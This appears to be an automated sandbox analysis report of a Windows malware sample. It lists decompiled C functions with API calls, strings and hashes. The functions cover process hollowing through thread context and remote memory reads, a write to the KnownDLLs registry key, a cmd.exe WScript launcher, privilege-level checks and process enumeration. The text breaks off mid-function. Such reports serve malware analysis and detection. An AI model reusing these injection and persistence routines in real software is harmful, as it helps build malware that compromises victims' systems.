0x00405cee
0x00405cf3
0x00405cf6
0x00405cfd
0x00405d0a
0x00405d0f
0x00405d11
0x00000000
0x00405d17
0x00405d17
0x00405d1d
0x00405d1f
0x00405d23
0x00405d65
0x00405d6b
0x00405d7e
0x00405d83
0x00405d85
0x00000000
0x00405d8b
0x00405d90
0x00405da0
0x00405da6
0x00405da8
0x00000000
0x00405dae
0x00405db1
0x00405db6
0x00405db8
0x00000000
0x00405dba
0x00405dbf
0x00405dd9
0x00405ddb
0x00405ddd
0x00405de7
0x00405e02
0x00405e0f
0x00405e0f
0x00405e1e
0x00405e23
0x00405e2e
0x00405e2e
0x00405db8
0x00405da8
0x00405d25
0x00405d25
0x00405d28
0x00405d2a
0x00405d30
0x00405d49
0x00405d4e
0x00405d50
0x00000000
0x00000000
0x00405d5a
0x00405d5b
0x00405d5e
0x00405d60
0x00000000
0x00405d62
0x00405d62
0x00000000
0x00405d62
0x00000000
0x00405d60
0x00000000
0x00405d30
0x00405d23
0x00405d11
0x00405cae
0x00405cb3
0x00405cb5
0x00000000
0x00405cb7
0x00405cc2
0x00405cc4
0x00000000
0x00000000
0x00000000
0x00000000
0x00405cc4
0x00405cb5
0x00405cac
0x00405c9e
0x00405c79
0x00405c60
0x00405bc6
0x00405bd7
0x00405bdc
0x00405bdf
0x00405be6
0x00000000
0x00405be8
0x00405bee
0x00405bee
0x00405be6
0x00000000

APIs

CreateProcessW.KERNEL32 ref: 00405C58
GetThreadContext.KERNEL32(I@,00010007,00000000,?,?,?,?,?,I@,?,?,?), ref: 00405C71
ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,?,?,?,I@,?,?,?), ref: 00405C96
SetThreadContext.KERNEL32(?,?,?,?,00000000,3875F923,00000004,?,?,00000000,?,0040C038,?,?,?,?), ref: 00405DA0
Sleep.KERNEL32(00001388,?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405DBF
VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405DD3
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000040), ref: 00405E0F
CloseHandle.KERNEL32(?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405E1E
CloseHandle.KERNEL32(?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405E23

Strings

I@, xrefs: 00405C6E
I@, xrefs: 00405BFE
D, xrefs: 00405C28
0125789244697858, xrefs: 00405BD2

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseContextHandleProcessThreadVirtual$AllocCreateFreeMemoryReadSleep
String ID: 0125789244697858$D$I@$I@
API String ID: 1428767187-3701513222
Opcode ID: 534cd3dfdfd28f86ae93a3f14db949cd784872d79c8532d27548abca3d40672f
Instruction ID: 2b955a6b4a58cd15ef933bbb3afc0f250c4904853c31c428a9eccdac0ead69e9
Opcode Fuzzy Hash: 534cd3dfdfd28f86ae93a3f14db949cd784872d79c8532d27548abca3d40672f
Instruction Fuzzy Hash: 91819071A40619ABEB109B90DD46FAFB7B8FB04704F044176FA04B62D0E775AA50CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405A50, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00405A50(void* __ecx, void* _a4, void* _a8, long* _a12, char _a16) {
				void* _v8;
				void* _t31;
				int _t32;
				int _t36;
				void* _t44;
				long _t46;
				void* _t56;
				void* _t60;

				 *_a12 = 0;
				_t2 =  &_a16; // 0x40563b
				 *( *_t2) = 0;
				_t56 = VirtualAlloc(0, 0x40, 0x3000, 4);
				if(_t56 == 0) {
					L3:
					return 0;
				} else {
					if(ReadProcessMemory(_a4, _a8, _t56, 0x40, 0) != 0) {
						if( *_t56 != 0x5a4d) {
							goto L2;
						} else {
							_v8 =  *((intOrPtr*)(_t56 + 0x3c));
							VirtualFree(_t56, 0, 0x8000);
							_t44 = VirtualAlloc(0, 0x18, 0x3000, 4);
							if(_t44 == 0) {
								L11:
								return 0;
							} else {
								_t31 = _a8 + _v8;
								_v8 = _t31;
								_t32 = ReadProcessMemory(_a4, _t31, _t44, 0x18, 0);
								_push(0x8000);
								_push(0);
								_push(_t44);
								if(_t32 == 0 ||  *_t44 != 0x4550) {
									L10:
									VirtualFree();
									goto L11;
								} else {
									VirtualFree();
									_t46 = ( *(_t44 + 0x14) & 0x0000ffff) + 0x18;
									_t60 = VirtualAlloc(0, _t46, 0x3000, 4);
									if(_t60 == 0) {
										goto L11;
									} else {
										_t36 = ReadProcessMemory(_a4, _v8, _t60, _t46, 0);
										_push(0x8000);
										_push(0);
										_push(_t60);
										if(_t36 != 0) {
											if( *_t60 != 0x4550) {
												goto L10;
											} else {
												 *_a12 =  *(_t60 + 0x50);
												_t17 =  &_a16; // 0x40563b
												 *((intOrPtr*)( *_t17)) =  *((intOrPtr*)(_t60 + 0x28));
												VirtualFree(??, ??, ??);
												return 1;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					} else {
						L2:
						VirtualFree(_t56, 0, 0x8000);
						goto L3;
					}
				}
			}

0x00405a61
0x00405a67
0x00405a73
0x00405a7b
0x00405a7f
0x00405aa4
0x00405aab
0x00405a81
0x00405a94
0x00405ab4
0x00000000
0x00405ab6
0x00405ac8
0x00405acb
0x00405ada
0x00405ade
0x00405b49
0x00405b51
0x00405ae0
0x00405ae3
0x00405aef
0x00405af2
0x00405af8
0x00405afd
0x00405aff
0x00405b02
0x00405b47
0x00405b47
0x00000000
0x00405b0c
0x00405b10
0x00405b19
0x00405b25
0x00405b29
0x00000000
0x00405b2b
0x00405b35
0x00405b3b
0x00405b40
0x00405b42
0x00405b45
0x00405b58
0x00000000
0x00405b5a
0x00405b60
0x00405b62
0x00405b68
0x00405b6a
0x00405b74
0x00405b74
0x00000000
0x00000000
0x00000000
0x00405b45
0x00405b29
0x00405b02
0x00405ade
0x00405a96
0x00405a96
0x00405a9e
0x00000000
0x00405a9e
0x00405a94

APIs

VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004,00005A4D,73B75B60,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405A79
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000040,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405A8C
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405A9E
VirtualFree.KERNEL32(00000000,00000000,00008000,I@,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405ACB
VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405AD8
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000018,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405AF2
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B10
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405B1F
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405B35
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B47
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B6A

Strings

I@, xrefs: 00405AB9
;V@, xrefs: 00405A67, 00405B62

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Virtual$Free$AllocMemoryProcessRead
String ID: ;V@$I@
API String ID: 1260273505-1952863460
Opcode ID: f26b90b78254076905d6d2fbb5c08ebbfb30092b78da21401849fee9cabb9fdf
Instruction ID: 663560f153661f58489f41854f68c215dbd6861c452647dabd8b659e9ddec512
Opcode Fuzzy Hash: f26b90b78254076905d6d2fbb5c08ebbfb30092b78da21401849fee9cabb9fdf
Instruction Fuzzy Hash: C4314F71741714BBEB309F95DC41F9B7BA8EB05B11F100065FB04AB2D1D6B5AD008FA8

Uniqueness

Uniqueness Score: -1.00%

Function 004082B0, Relevance: 13.6, APIs: 9, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E004082B0(intOrPtr _a4) {
				void* _v8;
				long _v12;
				void* _t20;
				void* _t27;
				void* _t34;
				void* _t37;
				void* _t38;

				_v8 = 0;
				_v12 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) == 0) {
					L4:
					return 0;
				} else {
					if(GetTokenInformation(_v8, 1, 0, 0,  &_v12) != 0 || GetLastError() == 0x7a) {
						_t20 = E004015E0(_v12);
						_t38 = _t37 + 4;
						_t34 = _t20;
						if(GetTokenInformation(_v8, 1, _t34, _v12,  &_v12) == 0 || IsValidSid( *_t34) == 0) {
							_push(_t34);
							goto L8;
						} else {
							_t27 = E00407AA0( *_t34, _a4);
							_t38 = _t38 + 8;
							_push(_t34);
							if(_t27 == 0) {
								L8:
								E00401510();
								CloseHandle(_v8);
								return 0;
							} else {
								E00401510();
								CloseHandle(_v8);
								return 1;
							}
						}
					} else {
						CloseHandle(_v8);
						goto L4;
					}
				}
			}

0x004082b9
0x004082c3
0x004082d9
0x00408306
0x0040830b
0x004082db
0x004082f0
0x00408310
0x00408315
0x00408318
0x0040832f
0x0040833d
0x00000000
0x00408356
0x0040835b
0x00408360
0x00408363
0x00408366
0x0040833e
0x0040833e
0x00408349
0x00408355
0x00408368
0x00408368
0x00408373
0x00408382
0x00408382
0x00408366
0x004082fd
0x00408300
0x00000000
0x00408300
0x004082f0

APIs

GetCurrentProcess.KERNEL32(00000008,00000400), ref: 004082CA
OpenProcessToken.ADVAPI32(00000000), ref: 004082D1
GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 004082E8
GetLastError.KERNEL32 ref: 004082F2
CloseHandle.KERNEL32(00000000), ref: 00408300
GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000), ref: 00408327
IsValidSid.ADVAPI32(00000000), ref: 00408333
CloseHandle.KERNEL32(00000000), ref: 00408349
CloseHandle.KERNEL32(00000000), ref: 00408373

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandleToken$InformationProcess$CurrentErrorLastOpenValid
String ID:
API String ID: 2832165296-0
Opcode ID: b5a0d24f3340db2a52b6e5b72ce1261ad8fa07ef55d193fc80752f6946e3dc09
Instruction ID: 6c80d8c1505064fb5d23a14c91f2f6bbea28928c87bc453829ba29e9ce75709a
Opcode Fuzzy Hash: b5a0d24f3340db2a52b6e5b72ce1261ad8fa07ef55d193fc80752f6946e3dc09
Instruction Fuzzy Hash: F5215E31A00108FBEF116FA0EE0AB9E7FB9EF54745F1000B5F945F51A1EB768E109A99

Uniqueness

Uniqueness Score: -1.00%

Function 00408390, Relevance: 13.6, APIs: 9, Instructions: 65
threadsleepprocessCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00408390(long* _a4) {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				void* _t35;

				_t35 = OpenProcess(0x1000, 0,  *_a4);
				if(_t35 == 0) {
					ExitThread(0);
				}
				while(1) {
					_v8 = 0;
					if(GetExitCodeProcess(_t35,  &_v8) == 0 || (0 | _v8 == 0x00000103) == 0) {
						break;
					}
					Sleep(0x7d0);
				}
				CloseHandle(_t35);
				E00401BB0( &_v92, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x14], xmm0");
				CreateProcessW( &(_a4[1]), 0, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
				CloseHandle(_v24.hThread);
				CloseHandle(_v24);
				ExitThread(_v24.dwProcessId);
			}

0x004083ab
0x004083af
0x00408447
0x00408447
0x004083c1
0x004083c4
0x004083d1
0x00000000
0x00000000
0x004083e8
0x004083e8
0x004083f3
0x004083fd
0x00408408
0x0040840b
0x0040842c
0x00408435
0x0040843a
0x0040843f

APIs

OpenProcess.KERNEL32(00001000,00000000,?), ref: 004083A5
GetExitCodeProcess.KERNEL32 ref: 004083CD
Sleep.KERNEL32(000007D0), ref: 004083E8
CloseHandle.KERNEL32(00000000), ref: 004083F3
CreateProcessW.KERNEL32 ref: 0040842C
CloseHandle.KERNEL32(?), ref: 00408435
CloseHandle.KERNEL32(?), ref: 0040843A
ExitThread.KERNEL32 ref: 0040843F
ExitThread.KERNEL32 ref: 00408447

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseExitHandleProcess$Thread$CodeCreateOpenSleep
String ID:
API String ID: 1465093181-0
Opcode ID: fbe44c1088de2dd18943f42bff4359acb9e52e68f53b43e8eab5e7423105ac84
Instruction ID: 538b4140d65d2fd151ab259c2702cab8e281b3ea1c27d0cfeab488a6800ad3c5
Opcode Fuzzy Hash: fbe44c1088de2dd18943f42bff4359acb9e52e68f53b43e8eab5e7423105ac84
Instruction Fuzzy Hash: 64114971A40319BBEB11DBA4DE45F9F7B78AF04741F140025B604BA1D1DBB4AE40CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00402DD0, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 29
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DD0(void* __ecx) {
				void* _v8;
				long _t8;

				_t1 =  &_v8; // 0x402f21
				_v8 = 0;
				_t8 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs", 0, 0xf003f, _t1);
				if(_t8 == 0) {
					RegSetValueExW(_v8, L"ntdll", 0, 1, L"ntdll.dll", 2 + E00401B40(L"ntdll.dll") * 2);
					return RegCloseKey(_v8);
				}
				return _t8;
			}

0x00402dd4
0x00402dd7
0x00402df0
0x00402df8
0x00402e20
0x00000000
0x00402e29
0x00402e32

APIs

RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs,00000000,000F003F,!/@), ref: 00402DF0
RegSetValueExW.ADVAPI32(00000000,ntdll,00000000,00000001,ntdll.dll,00000000), ref: 00402E20
RegCloseKey.ADVAPI32(00000000), ref: 00402E29

Strings

ntdll, xrefs: 00402E18
!/@, xrefs: 00402DD4, 00402DDE
ntdll.dll, xrefs: 00402DFA, 00402E0F
SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs, xrefs: 00402DE6

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseOpenValue
String ID: !/@$SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs$ntdll$ntdll.dll
API String ID: 779948276-871150387
Opcode ID: 2ac2e1f2ae53ea3f65214954049f4d68d98ab157eba3ad612de933165087b6f9
Instruction ID: 484440f86f87c03b30c3bb65dbd638c5ca07b71e5d6230add0e59dd50d7b01eb
Opcode Fuzzy Hash: 2ac2e1f2ae53ea3f65214954049f4d68d98ab157eba3ad612de933165087b6f9
Instruction Fuzzy Hash: E6F0A071680208BBEB119B91DE0BFAA7678E744B04F200076FA01B11E2E6B56E14D648

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00406CA0(intOrPtr _a4) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v1128;
				long _t25;

				E00401BB0( &_v88, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x10], xmm0");
				E00401A00( &_v1128, L"cmd.exe /C WScript \"");
				E00401970( &_v1128, _a4 - 0xffffff80);
				E00401970( &_v1128, "\"");
				_t25 = CreateProcessW(0,  &_v1128, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
				if(_t25 != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					ExitThread(_v20.dwProcessId);
				}
				ExitThread(_t25);
			}

0x00406cb1
0x00406cbc
0x00406cc5
0x00406cc9
0x00406cdc
0x00406ced
0x00406d15
0x00406d1d
0x00406d29
0x00406d32
0x00406d3b
0x00406d3b
0x00406d20

APIs

CreateProcessW.KERNEL32 ref: 00406D15
ExitThread.KERNEL32 ref: 00406D20
CloseHandle.KERNEL32(?), ref: 00406D29
CloseHandle.KERNEL32(?), ref: 00406D32
ExitThread.KERNEL32 ref: 00406D3B

Strings

cmd.exe /C WScript ", xrefs: 00406CBF

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseExitHandleThread$CreateProcess
String ID: cmd.exe /C WScript "
API String ID: 3397019416-3599441821
Opcode ID: 684bdaeb806f3df040d5c7cfd2e69662539794e42a811bb9b384c79524ea307f
Instruction ID: eef6df8135acf94fe22a1234d31cd8a2743a9bcf06af6411463f708c953a90e9
Opcode Fuzzy Hash: 684bdaeb806f3df040d5c7cfd2e69662539794e42a811bb9b384c79524ea307f
Instruction Fuzzy Hash: 05111BB1A40319BAEB10ABE0CE4AF9E777CAF15700F500176B305B50E2E779AA54CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00408270, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 24
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00408270(void* __ecx, char _a4) {
				char _v8;
				_Unknown_base(*)()* _t6;
				void* _t8;

				_v8 = 0;
				_t6 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
				if(_t6 == 0) {
					L3:
					return _v8;
				} else {
					_t3 =  &_a4; // 0x403432
					_t8 =  *_t6( *_t3,  &_v8);
					if(_t8 != 0) {
						goto L3;
					} else {
						return _t8;
					}
				}
			}

0x0040827e
0x0040828c
0x00408294
0x004082a7
0x004082ad
0x00408296
0x0040829a
0x0040829d
0x004082a1
0x00000000
0x004082a6
0x004082a6
0x004082a6
0x004082a1

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00403432), ref: 00408285
GetProcAddress.KERNEL32(00000000), ref: 0040828C

Strings

24@, xrefs: 0040829A
IsWow64Process, xrefs: 00408274
kernel32, xrefs: 00408279

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: 24@$IsWow64Process$kernel32
API String ID: 1646373207-2506754407
Opcode ID: 1784de0c5810e25c16468953f65073bf0f366bd13a04a3200ad938df08ff7324
Instruction ID: 4e0a41bddc85eb87f205be8107a504d095728719a775a610ae93757d078e0763
Opcode Fuzzy Hash: 1784de0c5810e25c16468953f65073bf0f366bd13a04a3200ad938df08ff7324
Instruction Fuzzy Hash: 6CE04F71644309ABDB10DBD0DE09B6E77ACDF41345F1441EDB808A2290EA799E109659

Uniqueness

Uniqueness Score: -1.00%

Function 004016A0, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004016A0(void* _a4, char _a8) {
				long _t5;
				long _t9;

				_t1 =  &_a8; // 0x404d23
				_t5 = HeapReAlloc(GetProcessHeap(), 0, _a4,  *_t1);
				_t9 = _t5;
				if(_t9 == 0) {
					HeapFree(GetProcessHeap(), _t5, _a4);
					return _t9;
				}
				return _t5;
			}

0x004016a4
0x004016b3
0x004016b9
0x004016bd
0x004016ca
0x00000000
0x004016d0
0x004016d4

APIs

GetProcessHeap.KERNEL32(00000000,00000000,#M@,00000000,?,00404D23,00000000,00000000), ref: 004016AC
HeapReAlloc.KERNEL32(00000000,?,00404D23,00000000,00000000), ref: 004016B3
GetProcessHeap.KERNEL32(00000000,00000000,?,00404D23,00000000,00000000), ref: 004016C3
HeapFree.KERNEL32(00000000,?,00404D23,00000000,00000000), ref: 004016CA

Strings

#M@, xrefs: 004016A4

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$Process$AllocFree
String ID: #M@
API String ID: 756756679-4131475827
Opcode ID: fc61fb002829f62c73740841c358f8d549b4fe25cca030ce621caa1704b7f87d
Instruction ID: ff7cb380345909262a6c5e90b85417ef13bbf769aef9ce5e450cfb0b8575ba0d
Opcode Fuzzy Hash: fc61fb002829f62c73740841c358f8d549b4fe25cca030ce621caa1704b7f87d
Instruction Fuzzy Hash: 24E0EC36900214BBCF111FE5AD1CA9A3F2DEB087A2F048424FB0DE6221C635CD20DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00408CE0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00408CE0() {
				_Unknown_base(*)()* _t2;
				signed int _t3;
				signed int _t5;
				void* _t9;

				 *0x5d2e0c = 0x11c;
				_t2 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion");
				if(_t2 != 0) {
					 *_t2(0x5d2e0c);
				}
				_t3 =  *0x5d2e10; // 0xa
				if(_t3 == 0) {
					L22:
					return _t3;
				} else {
					_t5 = _t3 << 0x00000008 |  *0x5d2e14;
					_t9 = _t5 - 0x602;
					if(_t9 > 0) {
						if(_t5 == 0x603) {
							 *0x5d2e08 = 4;
							return _t5;
						}
						if(_t5 == 0xa00) {
							_t3 =  *0x5d2e18; // 0x42ee
							if(_t3 < 0x3fab) {
								if(_t3 < 0x3ad7) {
									if(_t3 < 0x3839) {
										if(_t3 < 0x295a) {
											goto L22;
										} else {
											 *0x5d2e08 = 5;
											return _t3;
										}
									} else {
										 *0x5d2e08 = 6;
										return _t3;
									}
								} else {
									 *0x5d2e08 = 7;
									return _t3;
								}
							} else {
								 *0x5d2e08 = 8;
								return _t3;
							}
						} else {
							goto L12;
						}
					} else {
						if(_t9 == 0) {
							 *0x5d2e08 = 3;
							return _t5;
						} else {
							if(_t5 == 0x501) {
								 *0x5d2e08 = 1;
								return _t5;
							} else {
								if(_t5 != 0x601) {
									L12:
									 *0x5d2e08 = 0;
									return _t5;
								} else {
									 *0x5d2e08 = 2;
									return _t5;
								}
							}
						}
					}
				}
			}

0x00408cea
0x00408cfb
0x00408d03
0x00408d0a
0x00408d0a
0x00408d0c
0x00408d13
0x00408dca
0x00408dca
0x00408d19
0x00408d1c
0x00408d22
0x00408d27
0x00408d5f
0x00408dc0
0x00000000
0x00408dc0
0x00408d66
0x00408d73
0x00408d7d
0x00408d8f
0x00408da1
0x00408db3
0x00000000
0x00408db5
0x00408db5
0x00408dbf
0x00408dbf
0x00408da3
0x00408da3
0x00408dad
0x00408dad
0x00408d91
0x00408d91
0x00408d9b
0x00408d9b
0x00408d7f
0x00408d7f
0x00408d89
0x00408d89
0x00000000
0x00000000
0x00000000
0x00408d29
0x00408d29
0x00408d4f
0x00408d59
0x00408d2b
0x00408d30
0x00408d44
0x00408d4e
0x00408d32
0x00408d37
0x00408d68
0x00408d68
0x00408d72
0x00408d39
0x00408d39
0x00408d43
0x00408d43
0x00408d37
0x00408d30
0x00408d29
0x00408d27

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetVersion,00408DD5,00403448), ref: 00408CF4
GetProcAddress.KERNEL32(00000000), ref: 00408CFB

Strings

ntdll.dll, xrefs: 00408CE5
RtlGetVersion, xrefs: 00408CE0

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 1646373207-1489217083
Opcode ID: 7285d3ab72aa9700bc586f94e958407b6898de8486acee8395e58182b358e7c1
Instruction ID: 26c57fc426f1e3111cd77027b938fa7e90139beecd20d4fae7029aa442a0f424
Opcode Fuzzy Hash: 7285d3ab72aa9700bc586f94e958407b6898de8486acee8395e58182b358e7c1
Instruction Fuzzy Hash: 09110D751112008BEB25CF10DF9872A3799EB71700FA8497BD040E52E0CBFC85D9EA4A

Uniqueness

Uniqueness Score: -1.00%

Function 00408B00, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408B00(CHAR* _a4) {
				struct HINSTANCE__* _t3;

				_t1 =  &_a4; // 0x402b26
				_t3 = GetModuleHandleA( *_t1);
				if(_t3 == 0) {
					return LoadLibraryA(_a4);
				}
				return _t3;
			}

0x00408b03
0x00408b06
0x00408b0e
0x00000000
0x00408b13
0x00408b1a

APIs

GetModuleHandleA.KERNEL32(&+@,?,00402B26,?), ref: 00408B06
LoadLibraryA.KERNEL32(00000000,?,00402B26,?), ref: 00408B13

Strings

&+@, xrefs: 00408B03

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: &+@
API String ID: 4133054770-3274530745
Opcode ID: a2c9844b3c19bb96194046df9ca848ceace1c6f359e83cde6a5973935ba7ed72
Instruction ID: 6061ff5d45b2c9477c6e6c8a5bdf30d78efc3d99e478dc08a0e6e8702b224e8b
Opcode Fuzzy Hash: a2c9844b3c19bb96194046df9ca848ceace1c6f359e83cde6a5973935ba7ed72
Instruction Fuzzy Hash: 37C04C70100148EBDF011F62ED089993F6DEB416957408035F84DA4132DB369D519A98

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe PID: 5188 Parent PID: 3496 kZyzpfHFNNGrokCvTtkFvKwVRsROC.exeCOMMON

Executed Functions

Function 013C8390, Relevance: 13.6, APIs: 9, Instructions: 65
threadsleepprocessCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E013C8390(long* _a4) {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				int _t17;
				void* _t35;

				_t35 = OpenProcess(0x1000, 0,  *_a4);
				if(_t35 == 0) {
					ExitThread(0);
				}
				while(1) {
					_v8 = 0;
					_t17 = GetExitCodeProcess(_t35,  &_v8); // executed
					if(_t17 == 0 || (0 | _v8 == 0x00000103) == 0) {
						break;
					}
					Sleep(0x7d0); // executed
				}
				CloseHandle(_t35);
				E013C1BB0( &_v92, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x14], xmm0");
				CreateProcessW( &(_a4[1]), 0, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
				CloseHandle(_v24.hThread);
				CloseHandle(_v24);
				ExitThread(_v24.dwProcessId);
			}

0x013c83ab
0x013c83af
0x013c8447
0x013c8447
0x013c83c1
0x013c83c4
0x013c83cd
0x013c83d1
0x00000000
0x00000000
0x013c83e8
0x013c83e8
0x013c83f3
0x013c83fd
0x013c8408
0x013c840b
0x013c842c
0x013c8435
0x013c843a
0x013c843f

APIs

OpenProcess.KERNEL32(00001000,00000000,?), ref: 013C83A5
GetExitCodeProcess.KERNEL32(00000000,?), ref: 013C83CD
Sleep.KERNEL32(000007D0), ref: 013C83E8
CloseHandle.KERNEL32(00000000), ref: 013C83F3
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 013C842C
CloseHandle.KERNEL32(?), ref: 013C8435
CloseHandle.KERNEL32(?), ref: 013C843A
ExitThread.KERNEL32 ref: 013C843F
ExitThread.KERNEL32 ref: 013C8447

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: CloseExitHandleProcess$Thread$CodeCreateOpenSleep
String ID:
API String ID: 1465093181-0
Opcode ID: 71eb814f18da6efb1f85348962165ec643e23b4659062cf7cf81d3a72de460db
Instruction ID: 1449f5ec67f06e5048b7583180de8fd9a28a16dbfdd15bd8cb438502083fae40
Opcode Fuzzy Hash: 71eb814f18da6efb1f85348962165ec643e23b4659062cf7cf81d3a72de460db
Instruction Fuzzy Hash: 37116071A40219BFEB219BA4DC49F9E7B7CAF04B49F210015F604BA1D0DBB0BA44CBA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 013C80E0, Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 130
libraryprocessloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E013C80E0(void* __ebx, void* __edi, void* __esi, char _a4, intOrPtr* _a8, intOrPtr _a12) {
				void* _v8;
				struct HINSTANCE__* _v12;
				char _v272;
				intOrPtr _v300;
				void* _v308;
				struct HINSTANCE__* _t31;
				void* _t34;
				struct HINSTANCE__* _t39;
				void* _t49;
				void* _t51;
				void* _t55;
				void* _t57;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr* _t66;
				signed int _t69;
				void* _t72;

				if(_a4 == 0) {
					return E013C7EF0("explorer.exe");
				} else {
					_t69 = 0;
					_v308 = 0x128;
					_a4 = 0;
					_t61 = CreateToolhelp32Snapshot(2, 0);
					_v8 = _t61;
